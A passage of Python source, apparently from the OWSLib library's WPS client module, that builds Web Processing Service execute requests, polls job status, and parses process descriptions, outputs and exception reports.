# <wps:Reference xlink:href="http://igsarm-cida-gdp2.er.usgs.gov:8082/geoserver/wfs">
# <wps:Body>
# <wfs:GetFeature xmlns:wfs="http://www.opengis.net/wfs" xmlns:ogc="http://www.opengis.net/ogc" xmlns:gml="http://www.opengis.net/gml" service="WFS" version="1.1.0" outputFormat="text/xml; subtype=gml/3.1.1" xsi:schemaLocation="http://www.opengis.net/wfs ../wfs/1.1.0/WFS.xsd"> # noqa
# <wfs:Query typeName="sample:CONUS_States">
# <wfs:PropertyName>the_geom</wfs:PropertyName>
# <wfs:PropertyName>STATE</wfs:PropertyName>
# <ogc:Filter>
# <ogc:GmlObjectId gml:id="CONUS_States.508"/>
# </ogc:Filter>
# </wfs:Query>
# </wfs:GetFeature>
# </wps:Body>
# </wps:Reference>
# </wps:Input>
elif is_complexdata(val):
log.debug("complexdata %s", key)
inputElement.append(val.getXml())
elif is_boundingboxdata(val):
inputElement.append(val.get_xml())
else:
raise Exception(
'input type of "%s" parameter is unknown' % key)
# <wps:ResponseForm>
# <wps:ResponseDocument storeExecuteResponse="true" status="true" lineage="false">
# <wps:Output asReference="true" mimeType="application/json">
# <ows:Identifier>OUTPUT</ows:Identifier>
# </wps:Output>
# </wps:ResponseDocument>
# </wps:ResponseForm>
if output is not None:
responseFormElement = etree.SubElement(
root, nspath_eval('wps:ResponseForm', namespaces))
responseDocumentElement = etree.SubElement(
responseFormElement, nspath_eval(
'wps:ResponseDocument', namespaces),
attrib={'storeExecuteResponse': str(_async).lower(),
'status': str(_async).lower(),
'lineage': str(lineage).lower()})
# keeping backward compability of output parameter
if isinstance(output, str):
self._add_output(responseDocumentElement, output)
elif isinstance(output, list):
for ouputTuple in output:
# tuple (identifier, as_reference) for backward compatibility
if(len(ouputTuple) == 2):
(identifier, as_reference) = ouputTuple
mime_type = None
else:
(identifier, as_reference, mime_type) = ouputTuple
self._add_output(
responseDocumentElement, identifier, asReference=as_reference, mimeType=mime_type)
else:
raise Exception(
'output parameter is neither string nor list. output=%s' % output)
return root
def _add_output(self, element, identifier, asReference=None, mimeType=None):
output_element = etree.SubElement(
element, nspath_eval('wps:Output', namespaces))
if isinstance(mimeType, str):
output_element.attrib['mimeType'] = mimeType
if isinstance(asReference, bool):
output_element.attrib['asReference'] = str(asReference).lower()
# outputIdentifierElement
etree.SubElement(
output_element, nspath_eval('ows:Identifier', namespaces)).text = identifier
# wait for 60 seconds by default
def checkStatus(self, url=None, response=None, sleepSecs=60):
"""
Method to check the status of a job execution.
In the process, this method will update the object 'response' attribute.
:param str url: optional 'statusLocation' URL retrieved from a previous WPS Execute response document.
If not provided, the current 'statusLocation' URL will be used.
:param int sleepSecs: number of seconds to sleep before returning control to the caller.
"""
reader = WPSExecuteReader(verbose=self.verbose, auth=self.auth)
if response is None:
# override status location
if url is not None:
self.statusLocation = url
log.info('\nChecking execution status... (location=%s)' %
self.statusLocation)
try:
response = reader.readFromUrl(
self.statusLocation, headers=self.headers)
except Exception:
log.error("Could not read status document.")
else:
response = reader.readFromString(response)
# store latest response
try:
xml = etree.tostring(response)
except Exception:
log.error("Could not parse XML response.")
else:
self.response = xml
log.debug(self.response)
self.parseResponse(response)
# sleep given number of seconds
if self.isComplete() is False:
log.info('Sleeping %d seconds...' % sleepSecs)
sleep(sleepSecs)
def getStatus(self):
return self.status
def isComplete(self):
if (self.status == 'ProcessSucceeded' or self.status == 'ProcessFailed' or self.status == 'Exception'):
return True
elif (self.status == 'ProcessStarted'):
return False
elif (self.status == 'ProcessAccepted' or self.status == 'ProcessPaused'):
return False
else:
raise Exception(
'Unknown process execution status: %s' % self.status)
def isSucceded(self):
if self.status == 'ProcessSucceeded':
return True
else:
return False
def isNotComplete(self):
return not self.isComplete()
def getOutput(self, filepath=None):
"""
Method to write the outputs of a WPS process to a file:
either retrieves the referenced files from the server, or writes out the content of response embedded output.
:param filepath: optional path to the output file, otherwise a file will be created in the local directory with
the name assigned by the server, or default name 'wps.out' for embedded output.
"""
if self.isSucceded():
content = b''
for output in self.processOutputs:
output_content = output.retrieveData(
self.auth.username, self.auth.password,
headers=self.headers, verify=self.auth.verify, cert=self.auth.cert)
# ExecuteResponse contains reference to server-side output
if output_content != b'':
content = content + output_content
if filepath is None:
filepath = output.fileName
# ExecuteResponse contain embedded output
if len(output.data) > 0:
if filepath is None:
filepath = 'wps.out'
for data in output.data:
content = content + data.encode()
# write out content
if content != '':
out = open(filepath, 'wb')
out.write(content)
out.close()
log.info('Output written to file: %s' % filepath)
else:
raise Exception(
"Execution not successfully completed: status=%s" % self.status)
def submitRequest(self, request):
"""
Submits a WPS Execute document to a remote service, returns the XML response document from the server.
This method will save the request document and the first returned response document.
:param request: the XML request document to be submitted as POST to the server.
"""
self.request = request
reader = WPSExecuteReader(verbose=self.verbose, timeout=self.timeout, auth=self.auth)
response = reader.readFromUrl(
self.url, request, method='Post', headers=self.headers)
self.response = response
return response
'''
if response is None:
# override status location
if url is not None:
self.statusLocation = url
else:
response = reader.readFromString(response)
'''
def parseResponse(self, response):
"""
Method to parse a WPS response document
"""
rootTag = response.tag.split('}')[1]
# <ns0:ExecuteResponse>
if rootTag == 'ExecuteResponse':
self._parseExecuteResponse(response)
# <ows:ExceptionReport>
elif rootTag == 'ExceptionReport':
self._parseExceptionReport(response)
else:
log.debug('Unknown Response')
# log status, errors
log.info('Execution status=%s' % self.status)
log.info('Percent completed=%s' % self.percentCompleted)
log.info('Status message=%s' % self.statusMessage)
for error in self.errors:
dump(error)
def _parseExceptionReport(self, root):
"""
Method to parse a WPS ExceptionReport document and populate this object's metadata.
"""
# set exception status
self.status = "Exception"
for exceptionEl in root.findall(nspath('Exception', ns=namespaces['ows'])):
self.errors.append(WPSException(exceptionEl))
def _parseExecuteResponse(self, root):
"""
Method to parse a WPS ExecuteResponse response document and populate this object's metadata.
"""
# retrieve WPS namespace directly from root element
wpsns = getNamespace(root)
self.serviceInstance = root.get('serviceInstance')
if self.statusLocation is None:
self.statusLocation = root.get('statusLocation')
# <ns0:Status creationTime="2011-11-09T14:19:50Z">
# <ns0:ProcessSucceeded>PyWPS Process v.net.path successfully calculated</ns0:ProcessSucceeded>
# </ns0:Status>
# OR
# <ns0:Status creationTime="2011-11-07T08:26:44.359-06:00">
# <ns0:ProcessFailed>
# <ows:ExceptionReport xmlns:ows="http://www.opengis.net/ows/1.1">
# <ows:Exception>
# <ows:ExceptionText>Attribute null not found in feature collection</ows:ExceptionText>
# </ows:Exception>
# </ows:ExceptionReport>
# </ns0:ProcessFailed>
# </ns0:Status>
statusEl = root.find(nspath('Status/*', ns=wpsns))
self.status = statusEl.tag.split('}')[1]
# creationTime attribute
element = root.find(nspath('Status', ns=wpsns))
self.creationTime = testXMLAttribute(element, 'creationTime')
# get progress info
if self.status == 'ProcessSucceeded':
self.percentCompleted = 100
else:
try:
percentCompleted = int(statusEl.get('percentCompleted'))
self.percentCompleted = percentCompleted
except Exception:
pass
# get status message
self.statusMessage = statusEl.text
# exceptions ?
for element in statusEl:
if element.tag.endswith('ExceptionReport'):
self._parseExceptionReport(element)
self.process = Process(
root.find(nspath('Process', ns=wpsns)), verbose=self.verbose)
# <wps:DataInputs xmlns:wps="http://www.opengis.net/wps/1.0.0"
# xmlns:ows="http://www.opengis.net/ows/1.1"
# xmlns:xlink="http://www.w3.org/1999/xlink">
if len(self.dataInputs) > 0:
log.debug('clean data inputs')
self.dataInputs[:] = []
for inputElement in root.findall(nspath('DataInputs/Input', ns=wpsns)):
self.dataInputs.append(Output(inputElement))
if self.verbose is True:
dump(self.dataInputs[-1])
# <ns:ProcessOutputs>
# xmlns:ns="http://www.opengis.net/wps/1.0.0"
if len(self.processOutputs) > 0:
log.debug('clean process outputs')
self.processOutputs[:] = []
for outputElement in root.findall(nspath('ProcessOutputs/Output', ns=wpsns)):
self.processOutputs.append(Output(outputElement))
if self.verbose is True:
dump(self.processOutputs[-1])
class ComplexData(object):
"""
Class that represents a ComplexData element in a WPS document
"""
def __init__(self, mimeType=None, encoding=None, schema=None):
self.mimeType = mimeType
self.encoding = encoding
self.schema = schema
class InputOutput(object):
"""
Superclass of a WPS input or output data object.
"""
def __init__(self, element):
self.abstract = None
self.metadata = []
# loop over sub-elements without requiring a specific namespace
for child in element:
# <ows:Identifier xmlns:ows="http://www.opengis.net/ows/1.1">SUMMARIZE_TIMESTEP</ows:Identifier>
if child.tag.endswith('Identifier'):
self.identifier = testXMLValue(child)
# <ows:Title xmlns:ows="http://www.opengis.net/ows/1.1">Summarize Timestep</ows:Title>
elif child.tag.endswith('Title'):
self.title = testXMLValue(child)
# <ows:Abstract xmlns:ows="http://www.opengis.net/ows/1.1">
# If selected, processing output will include columns with summarized statistics for all
# feature attribute values for each timestep
# </ows:Abstract>
elif child.tag.endswith('Abstract'):
self.abstract = testXMLValue(child)
# <ows:Metadata xlink:title="Documentation" xlink:href="http://emu.readthedocs.org/en/latest/"/>
elif child.tag.endswith('Metadata'):
self.metadata.append(Metadata(child))
self.allowedValues = []
self.supportedValues = []
self.defaultValue = None
self.dataType = None
self.anyValue = False
def _parseData(self, element):
"""
Method to parse a "Data" element
"""
# <ns0:Data>
# <ns0:ComplexData mimeType="text/plain">
# 7504912.93758151 -764109.175074507,7750849.82379226 -22141.8611641468,8561828.42371234 -897195.923493867,7724946.16844165 -602984.014261927 # noqa
# </ns0:ComplexData>
# </ns0:Data>
# nspath('Data', ns=WPS_NAMESPACE)
complex_data_element = element.find(
nspath('ComplexData', ns=getNamespace(element)))
if complex_data_element is not None:
self.dataType = "ComplexData"
def _parseLiteralData(self, element, literalElementName):
"""
Method to parse the LiteralData element.
"""
# <LiteralData>
# <ows:DataType ows:reference="xs:string" xmlns:ows="http://www.opengis.net/ows/1.1" />
# <ows:AllowedValues xmlns:ows="http://www.opengis.net/ows/1.1">
# <ows:Value>COMMA</ows:Value>
# <ows:Value>TAB</ows:Value>
# <ows:Value>SPACE</ows:Value>
# </ows:AllowedValues>
# <DefaultValue>COMMA</DefaultValue>
# </LiteralData>
# <LiteralData>
# <ows:DataType ows:reference="xs:anyURI" xmlns:ows="http://www.opengis.net/ows/1.1" />
# <ows:AnyValue xmlns:ows="http://www.opengis.net/ows/1.1" />
# </LiteralData>
literal_data_element = element.find(literalElementName)
if literal_data_element is not None:
self.dataType = 'LiteralData'
for sub_element in literal_data_element:
subns = getNamespace(sub_element)
if sub_element.tag.endswith('DataType'):
self.dataType = sub_element.text
if not self.dataType:
reference = sub_element.get(nspath("reference", ns=subns))
# backward search of first non-alpha character (:, #, /, etc.)
pos = len(reference) - 1
while pos >= 0 and reference[pos].isalpha():
pos -= 1
# obtain substring after found non-alpha character position
self.dataType = reference[pos + 1:]
for sub_element in literal_data_element:
subns = getNamespace(sub_element)
if sub_element.tag.endswith('DefaultValue'):
self.defaultValue = getTypedValue(
self.dataType, sub_element.text)
if sub_element.tag.endswith('AllowedValues'):
for value in sub_element.findall(nspath('Value', ns=subns)):
self.allowedValues.append(
getTypedValue(self.dataType, value.text))
elif sub_element.tag.endswith('AnyValue'):
self.anyValue = True
def _parseComplexData(self, element, complexDataElementName):
"""
Method to parse a ComplexData or ComplexOutput element.
"""
# <ComplexData>
# <Default>
# <Format>
# <MimeType>text/xml</MimeType>
# <Encoding>UTF-8</Encoding>
# <Schema>http://schemas.opengis.net/gml/2.0.0/feature.xsd</Schema>
# </Format>
# </Default>
# <Supported>
# <Format>
# <MimeType>text/xml</MimeType>
# <Encoding>UTF-8</Encoding>
# <Schema>http://schemas.opengis.net/gml/2.0.0/feature.xsd</Schema>
# </Format>
# <Format>
# <MimeType>text/xml</MimeType>
# <Encoding>UTF-8</Encoding>
# <Schema>http://schemas.opengis.net/gml/2.1.1/feature.xsd</Schema>
# </Format>
# </Supported>
# </ComplexData>
# OR
# <ComplexOutput defaultEncoding="UTF-8" defaultFormat="text/XML" defaultSchema="NONE">
# <SupportedComplexData>
# <Format>text/XML</Format>
# <Encoding>UTF-8</Encoding>
# <Schema>NONE</Schema>
# </SupportedComplexData>
# </ComplexOutput>
complex_data_element = element.find(complexDataElementName)
if complex_data_element is not None:
self.dataType = "ComplexData"
for supported_comlexdata_element in\
complex_data_element.findall('SupportedComplexData'):
self.supportedValues.append(
ComplexData(
mimeType=testXMLValue(
supported_comlexdata_element.find('Format')),
encoding=testXMLValue(
supported_comlexdata_element.find('Encoding')),
schema=testXMLValue(
supported_comlexdata_element.find('Schema'))
)
)
for format_element in\
complex_data_element.findall('Supported/Format'):
self.supportedValues.append(
ComplexData(
mimeType=testXMLValue(format_element.find('MimeType')),
encoding=testXMLValue(format_element.find('Encoding')),
schema=testXMLValue(format_element.find('Schema'))
)
)
default_format_element = complex_data_element.find('Default/Format')
if default_format_element is not None:
self.defaultValue = ComplexData(
mimeType=testXMLValue(
default_format_element.find('MimeType')),
encoding=testXMLValue(
default_format_element.find('Encoding')),
schema=testXMLValue(default_format_element.find('Schema'))
)
def _parseBoundingBoxData(self, element, bboxElementName):
"""
Method to parse the BoundingBoxData element.
"""
# <BoundingBoxData>
# <Default>
# <CRS>epsg:4326</CRS>
# </Default>
# <Supported>
# <CRS>epsg:4326</CRS>
# </Supported>
# </BoundingBoxData>
#
# OR
#
# <BoundingBoxOutput>
# <Default>
# <CRS>epsg:4326</CRS>
# </Default>
# <Supported>
# <CRS>epsg:4326</CRS>
# </Supported>
# </BoundingBoxOutput>
bbox_data_element = element.find(bboxElementName)
if bbox_data_element is not None:
self.dataType = 'BoundingBoxData'
for bbox_element in bbox_data_element.findall('Supported/CRS'):
self.supportedValues.append(bbox_element.text)
default_bbox_element = bbox_data_element.find('Default/CRS')
if default_bbox_element is not None:
self.defaultValue = default_bbox_element.text
class Input(InputOutput):
"""
Class that represents a WPS process input.
"""
def __init__(self, inputElement):
# superclass initializer
super(Input, self).__init__(inputElement)
# <Input maxOccurs="1" minOccurs="0">
# OR
# <MinimumOccurs>1</MinimumOccurs>
self.minOccurs = -1
if inputElement.get("minOccurs") is not None:
self.minOccurs = int(inputElement.get("minOccurs"))
if inputElement.find('MinimumOccurs') is not None:
self.minOccurs = int(
testXMLValue(inputElement.find('MinimumOccurs')))
self.maxOccurs = -1
if inputElement.get("maxOccurs") is not None:
self.maxOccurs = int(inputElement.get("maxOccurs"))
if inputElement.find('MaximumOccurs') is not None:
self.maxOccurs = int(
testXMLValue(inputElement.find('MaximumOccurs')))
# <LiteralData>
self._parseLiteralData(inputElement, 'LiteralData')
# <ComplexData>
self._parseComplexData(inputElement, 'ComplexData')
# <BoundingBoxData>
self._parseBoundingBoxData(inputElement, 'BoundingBoxData')
class Output(InputOutput):
"""
Class that represents a WPS process output.
"""
def __init__(self, outputElement):
# superclass initializer
super(Output, self).__init__(outputElement)
self.reference = None
self.mimeType = None
self.data = []
self.fileName = None
self.filePath = None
# extract wps namespace from outputElement itself
wpsns = getNamespace(outputElement)
# <ns:Reference encoding="UTF-8" mimeType="text/csv"
# href="http://cida.usgs.gov/climate/gdp/process/RetrieveResultServlet?id=1318528582026OUTPUT.601bb3d0-547f-4eab-8642-7c7d2834459e"
# />
referenceElement = outputElement.find(nspath('Reference', ns=wpsns))
if referenceElement is not None:
# extract xlink namespace
xlinkns = get_namespaces()['xlink']
xlink_href = '{{{}}}href'.format(xlinkns)
if xlink_href in list(referenceElement.keys()):
self.reference = referenceElement.get(xlink_href)
else:
self.reference = referenceElement.get('href')
self.mimeType = referenceElement.get('mimeType')
# <LiteralOutput>
self._parseLiteralData(outputElement, 'LiteralOutput')
# <ComplexData> or <ComplexOutput>
self._parseComplexData(outputElement, 'ComplexOutput')
# <BoundingBoxOutput>
self._parseBoundingBoxData(outputElement, 'BoundingBoxOutput')
# <Data>
# <ns0:Data>
# <ns0:ComplexData mimeType="text/plain">
# 7504912.93758151 -764109.175074507,7750849.82379226 -22141.8611641468,8561828.42371234 -897195.923493867,7724946.16844165 -602984.014261927 # noqa
# </ns0:ComplexData>
# </ns0:Data>
# OR:
# <ns0:Data>
# <ns0:ComplexData encoding="UTF-8" mimeType="text/xml" schema="http://schemas.opengis.net/gml/2.1.2/feature.xsd"> # noqa
# <ns3:FeatureCollection xsi:schemaLocation="http://ogr.maptools.org/ output_0n7ij9D.xsd" xmlns:ns3="http://ogr.maptools.org/"> # noqa
# <gml:boundedBy xmlns:gml="http://www.opengis.net/gml">
# <gml:Box>
# <gml:coord><gml:X>-960123.1421801626</gml:X><gml:Y>4665723.56559387</gml:Y></gml:coord>
# <gml:coord><gml:X>-101288.6510608822</gml:X><gml:Y>5108200.011823481</gml:Y></gml:coord>
# </gml:Box>
# </gml:boundedBy>
# <gml:featureMember xmlns:gml="http://www.opengis.net/gml">
# <ns3:output fid="F0">
# <ns3:geometryProperty><gml:LineString><gml:coordinates>-960123.142180162365548,4665723.565593870356679,0 -960123.142180162365548,4665723.565593870356679,0 -960123.142180162598379,4665723.565593870356679,0 -960123.142180162598379,4665723.565593870356679,0 -711230.141176006174646,4710278.48552671354264,0 -711230.141176006174646,4710278.48552671354264,0 -623656.677859728806652,4848552.374973464757204,0 -623656.677859728806652,4848552.374973464757204,0 # noqa -410100.337491964863148,4923834.82589447684586,0 -410100.337491964863148,4923834.82589447684586,0 -101288.651060882242746,5108200.011823480948806,0 -101288.651060882242746,5108200.011823480948806,0 -101288.651060882257298,5108200.011823480948806,0 -101288.651060882257298,5108200.011823480948806,0</gml:coordinates></gml:LineString></ns3:geometryProperty>
# <ns3:cat>1</ns3:cat>
# <ns3:id>1</ns3:id>
# <ns3:fcat>0</ns3:fcat>
# <ns3:tcat>0</ns3:tcat>
# <ns3:sp>0</ns3:sp>
# <ns3:cost>1002619.181</ns3:cost>
# <ns3:fdist>0</ns3:fdist>
# <ns3:tdist>0</ns3:tdist>
# </ns3:output>
# </gml:featureMember>
# </ns3:FeatureCollection>
# </ns0:ComplexData>
# </ns0:Data>
#
#
# OWS BoundingBox:
#
# <wps:Data>
# <ows:BoundingBox crs="EPSG:4326" dimensions="2">
# <ows:LowerCorner>0.0 -90.0</ows:LowerCorner>
# <ows:UpperCorner>180.0 90.0</ows:UpperCorner>
# </ows:BoundingBox>
# </wps:Data>
#
dataElement = outputElement.find(nspath('Data', ns=wpsns))
if dataElement is not None:
complexDataElement = dataElement.find(
nspath('ComplexData', ns=wpsns))
if complexDataElement is not None:
self.dataType = "ComplexData"
self.mimeType = complexDataElement.get('mimeType')
if complexDataElement.text is not None and complexDataElement.text.strip() != '':
self.data.append(complexDataElement.text.strip())
for child in complexDataElement:
self.data.append(etree.tostring(child))
literalDataElement = dataElement.find(
nspath('LiteralData', ns=wpsns))
if literalDataElement is not None:
self.dataType = literalDataElement.get('dataType')
if literalDataElement.text is not None and literalDataElement.text.strip() != '':
self.data.append(literalDataElement.text.strip())
bboxDataElement = dataElement.find(nspath('BoundingBox', ns=namespaces['ows']))
if bboxDataElement is not None:
# TODO: just a workaround for data-inputs in lineage
bboxDataElement = dataElement.find(nspath('BoundingBoxData', ns=namespaces['wps']))
if bboxDataElement is not None:
self.dataType = "BoundingBoxData"
bbox = BoundingBox(bboxDataElement)
if bbox:
self.data.append(bbox)
def retrieveData(self, username=None, password=None, headers=None, verify=True, cert=None):
"""
Method to retrieve data from server-side reference:
returns "" if the reference is not known.
:param username: credentials to access the remote WPS server
:param password: credentials to access the remote WPS server
"""
url = self.reference
if url is None:
return b''
# a) 'http://cida.usgs.gov/climate/gdp/process/RetrieveResultServlet?id=1318528582026OUTPUT.601bb3d0-547f-4eab-8642-7c7d2834459e' # noqa
# b) 'http://rsg.pml.ac.uk/wps/wpsoutputs/outputImage-11294Bd6l2a.tif'
log.info('Output URL=%s' % url)
if '?' in url:
spliturl = url.split('?')
u = openURL(spliturl[0], spliturl[
1], method='Get', username=username, password=password,
headers=headers, verify=verify, cert=cert)
# extract output filepath from URL query string
self.fileName = spliturl[1].split('=')[1]
else:
u = openURL(
url, '', method='Get', username=username, password=password,
headers=headers, verify=verify, cert=cert)
# extract output filepath from base URL
self.fileName = url.split('/')[-1]
return u.read()
def writeToDisk(self, path=None, username=None, password=None,
headers=None, verify=True, cert=None):
"""
Method to write an output of a WPS process to disk:
it either retrieves the referenced file from the server, or write out the content of response embedded output.
:param filepath: optional path to the output file, otherwise a file will be created in the local directory
with the name assigned by the server,
:param username: credentials to access the remote WPS server
:param password: credentials to access the remote WPS server
"""
# Check if ExecuteResponse contains reference to server-side output
content = self.retrieveData(username, password, headers=headers, verify=verify, cert=cert)
# ExecuteResponse contain embedded output
if content == "" and len(self.data) > 0:
self.fileName = self.identifier
for data in self.data:
content = content + data
# write out content
if content != "":
if self.fileName == "":
self.fileName = self.identifier
self.filePath = path + self.fileName
out = open(self.filePath, 'wb')
out.write(content)
out.close()
log.info('Output written to file: %s' % self.filePath)
class WPSException:
"""
Class representing an exception raised by a WPS.
"""
def __init__(self, root):
self.code = root.attrib.get("exceptionCode", None)
self.locator = root.attrib.get("locator", None)
textEl = root.find(nspath('ExceptionText', ns=getNamespace(root)))
if textEl is not None:
self.text = textEl.text
else:
self.text = ""
class Metadata(object):
"""Initialize an OWS Metadata construct"""
def __init__(self, elem, namespace=DEFAULT_OWS_NAMESPACE):
self.url = None
self.title = None
self.role = None
if elem is not None:
urlattrib = elem.attrib.get(nspath('href', XLINK_NAMESPACE))
if urlattrib is not None:
self.url = testXMLValue(urlattrib, True)
titleattrib = elem.attrib.get(nspath('title', XLINK_NAMESPACE))
if titleattrib is not None:
self.title = testXMLValue(titleattrib, True)
roleattrib = elem.attrib.get(nspath('role', XLINK_NAMESPACE))
if roleattrib is not None:
self.role = testXMLValue(roleattrib, True)
class Process(object):
"""
Class that represents a WPS process.
"""
def __init__(self, elem, verbose=False):
""" Initialization method extracts all available metadata from an XML document (passed in as etree object) """
# <ns0:ProcessDescriptions service="WPS" version="1.0.0"
# xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsDescribeProcess_response.xsd" # noqa
# xml:lang="en-US" xmlns:ns0="http://www.opengis.net/wps/1.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> # noqa
# OR:
# <ns0:Process ns0:processVersion="1.0.0">
self._root = elem
self.verbose = verbose
wpsns = getNamespace(elem)
def get_bool_attribute(elem, attribute):
property = elem.get(attribute, '').lower()
if property == 'true':
value = True
elif property == 'false':
value = False
else:
value = None
return value
# <ProcessDescription statusSupported="true" storeSupported="true" ns0:processVersion="1.0.0">
self.processVersion = elem.get(nspath('processVersion', ns=wpsns))
self.statusSupported = get_bool_attribute(elem, "statusSupported")
self.storeSupported = get_bool_attribute(elem, "storeSupported")
self.identifier = None
self.title = None
self.abstract = None
self.metadata = []
for child in elem:
# this element's namespace
# TODO: ns not used
# ns = getNamespace(child)
# <ows:Identifier xmlns:ows="http://www.opengis.net/ows/1.1">
# gov.usgs.cida.gdp.wps.algorithm.FeatureWeightedGridStatisticsAlgorithm
# </ows:Identifier>
if child.tag.endswith('Identifier'):
self.identifier = testXMLValue(child)
# <ows:Title xmlns:ows="http://www.opengis.net/ows/1.1">
# Feature Weighted Grid Statistics
# </ows:Title>
elif child.tag.endswith('Title'):
self.title = testXMLValue(child)
# <ows:Abstract xmlns:ows="http://www.opengis.net/ows/1.1">
# This algorithm generates area weighted statistics of a gridded dataset for
# a set of vector polygon features. Using the bounding-box that encloses
# the feature data and the time range, if provided, a subset of the gridded dataset
# is requested from the remote gridded data server.
# Polygon representations are generated for cells in the retrieved grid.
# The polygon grid-cell representations are then projected to the feature data
# coordinate reference system. The grid-cells are used to calculate per grid-cell
# feature coverage fractions. Area-weighted statistics are then calculated for each feature
# using the grid values and fractions as weights. If the gridded dataset has a time range
# the last step is repeated for each time step within the time range or all time steps
# if a time range was not supplied.
# </ows:Abstract>
elif child.tag.endswith('Abstract'):
self.abstract = testXMLValue(child)
# <ows:Metadata xlink:title="Documentation" xlink:href="http://emu.readthedocs.org/en/latest/"/>
elif child.tag.endswith('Metadata'):
self.metadata.append(Metadata(child))
if self.verbose is True:
dump(self)
# <DataInputs>
self.dataInputs = []
for inputElement in elem.findall('DataInputs/Input'):
self.dataInputs.append(Input(inputElement))
if self.verbose is True:
dump(self.dataInputs[-1], prefix='\tInput: ')
# <ProcessOutputs>
self.processOutputs = []
for outputElement in elem.findall('ProcessOutputs/Output'):
self.processOutputs.append(Output(outputElement))
if self.verbose is True:
dump(self.processOutputs[-1], prefix='\tOutput: ')
def __str__(self):
return "WPS Process: {}, title={}".format(self.identifier or '', self.title or '')
def __repr__(self):
return "<owslib.wps.Process {}>".format(self.identifier or '')
class BoundingBoxDataInput(object):
"""
Data input class for ``wps:BoundingBoxData``.
:param list data: Coordinates of lower and upper corner. Example [10, 50, 20, 60]
with lower corner=[10, 50] and upper corner=[20, 60].
:param str crs: Name of coordinate reference system. Default: "epsg:4326".
"""
def __init__(self, data, crs=None, dimensions=2):
if isinstance(data, list):
self.data = data
else:
# convenience method for string input
self.data = [float(number) for number in data.split(',')]
self.lower_corner = (self.data[0], self.data[1])
self.upper_corner = (self.data[2], self.data[3])
self.dimensions = dimensions
self.crs = crs or 'epsg:4326'
def get_xml(self):
"""
Method that returns the object data as an XML snippet,
to be inserted into the WPS request document sent to the server.
"""
'''
<wps:Data>
<wps:BoundingBoxData crs="EPSG:4326" dimenstions="2">
<ows:LowerCorner>51.9 7.0</ows:LowerCorner>
<ows:UpperCorner>53.0 8.0</ows:UpperCorner>
</wps:BoundingBoxData>
</wps:Data>
'''
data_el = etree.Element(nspath_eval('wps:Data', namespaces))
attrib = dict()
if self.crs:
attrib['crs'] = self.crs
if self.dimensions:
attrib['dimensions'] = str(self.dimensions)
bbox_el = etree.SubElement(
data_el, nspath_eval('wps:BoundingBoxData', namespaces), attrib=attrib)
lc_el = etree.SubElement(
bbox_el, nspath_eval('ows:LowerCorner', namespaces))
lc_el.text = "{0[0]} {0[1]}".format(self.lower_corner)
uc_el = etree.SubElement(
bbox_el, nspath_eval('ows:UpperCorner', namespaces))
uc_el.text = "{0[0]} {0[1]}".format(self.upper_corner)
return data_el
class ComplexDataInput(IComplexDataInput, ComplexData):
def __init__(self, value, mimeType=None, encoding=None, schema=None):
super(ComplexDataInput, self).__init__(
mimeType=mimeType, encoding=encoding, schema=schema)
self.value = value
def getXml(self):
if is_reference(self.value):
return self.complexDataAsReference()
else:
return self.complexDataRaw()
def complexDataAsReference(self):
"""
<wps:Reference xlink:href="http://somewhere/test.xml"/>
"""
attrib = {nspath_eval("xlink:href", namespaces): self.value}
if self.encoding:
attrib['encoding'] = self.encoding
if self.schema:
attrib['schema'] = self.schema
if self.mimeType:
attrib['mimeType'] = self.mimeType
refElement = etree.Element(nspath_eval('wps:Reference', namespaces), attrib)
return refElement
def complexDataRaw(self):
'''
<wps:Data>
<wps:ComplexData mimeType="text/xml" encoding="UTF-8"
schema="http://schemas.opengis.net/gml/3.1.1/base/feature.xsd">
</wps:ComplexData>
</wps:Data>
'''
dataElement = etree.Element(nspath_eval('wps:Data', namespaces))
attrib = dict()
if self.encoding:
attrib['encoding'] = self.encoding
if self.schema:
attrib['schema'] = self.schema
if self.mimeType:
attrib['mimeType'] = self.mimeType
complexDataElement = etree.SubElement(
dataElement, nspath_eval('wps:ComplexData', namespaces), attrib=attrib)
complexDataElement.text = self.value
return dataElement
class FeatureCollection(IComplexDataInput):
'''
Base class to represent a Feature Collection used as input to a WPS request.
The method getXml() is invoked by the WPS execute() method to build the WPS request.
All subclasses must implement the getXml() method to provide their specific XML.
Implements IComplexDataInput.
'''
def __init__(self):
pass
def getXml(self):
raise NotImplementedError
class WFSFeatureCollection(FeatureCollection):
'''
FeatureCollection specified by a WFS query.
All subclasses must implement the getQuery() method to provide the specific query portion of the XML.
'''
def __init__(self, wfsUrl, wfsQuery, wfsMethod=None):
'''
wfsUrl: the WFS service URL
example: wfsUrl = "http://igsarm-cida-gdp2.er.usgs.gov:8082/geoserver/wfs"
wfsQuery : a WFS query instance
'''
self.url = wfsUrl
self.query = wfsQuery
self.method = wfsMethod
# <wps:Reference xlink:href="http://igsarm-cida-gdp2.er.usgs.gov:8082/geoserver/wfs">
# <wps:Body>
# <wfs:GetFeature xmlns:wfs="http://www.opengis.net/wfs" xmlns:ogc="http://www.opengis.net/ogc" xmlns:gml="http://www.opengis.net/gml" service="WFS" version="1.1.0" outputFormat="text/xml; subtype=gml/3.1.1" xsi:schemaLocation="http://www.opengis.net/wfs ../wfs/1.1.0/WFS.xsd"> # noqa
# .......
# </wfs:GetFeature>
# </wps:Body>
# </wps:Reference>
def getXml(self):
root = etree.Element(nspath_eval('wps:Reference', namespaces),
attrib={nspath_eval("xlink:href", namespaces): self.url})
if self.method:
root.attrib['method'] = self.method
bodyElement = etree.SubElement(
root, nspath_eval('wps:Body', namespaces))
getFeatureElement = etree.SubElement(
bodyElement, nspath_eval('wfs:GetFeature', namespaces),
attrib={"service": "WFS",
"version": "1.1.0",
"outputFormat": "text/xml; subtype=gml/3.1.1",
nspath_eval("xsi:schemaLocation", namespaces): "%s %s" % (namespaces['wfs'], WFS_SCHEMA_LOCATION)})
# <wfs:Query typeName="sample:CONUS_States">
# <wfs:PropertyName>the_geom</wfs:PropertyName>
# <wfs:PropertyName>STATE</wfs:PropertyName>
# <ogc:Filter>
# <ogc:GmlObjectId gml:id="CONUS_States.508"/>
# </ogc:Filter>
# </wfs:Query>
getFeatureElement.append(self.query.getXml())
return root
class WFSQuery(IComplexDataInput):
'''
Class representing a WFS query, for insertion into a WFSFeatureCollection instance.
Implements IComplexDataInput.
'''
def __init__(self, typeName, propertyNames=[], filters=[]):
self.typeName = typeName
self.propertyNames = propertyNames
self.filters = filters
def getXml(self):
# <wfs:Query typeName="sample:CONUS_States">
